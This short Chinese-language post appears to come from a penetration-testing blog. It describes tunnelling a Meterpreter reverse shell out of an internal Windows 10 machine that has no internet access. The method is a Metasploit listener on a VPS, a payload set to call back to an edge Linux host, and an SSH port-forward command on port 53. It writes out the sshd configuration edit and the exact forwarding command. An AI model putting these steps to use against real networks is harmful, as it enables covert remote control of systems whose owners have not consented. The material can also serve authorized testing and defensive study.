上一篇：ssh端口转发

总结：

需要vps一台，内网能出网的linux机器一台

vps msf监听

生成一个msf的payload，反弹的IP要填为边界出口linux的IP

ssh端口转发

修改配置文件，允许端口转发
vi /etc/ssh/sshd_config

重启ssh，使配置文件生效
/etc/init.d/sshd restart

参考上一篇文章，进行ssh端口转发
ssh -C -f -N -g -L 0.0.0.0:53:192.168.3.96:53 root@192.168.5.16 -p 22

netstat -tulnp | grep “:53”

在win10机器上执行exe，vps上即可上线

参考资料

micro8

《第一百二十二课：利用 ssh隧道实现内网断网机meterpreter反向上线.pdf》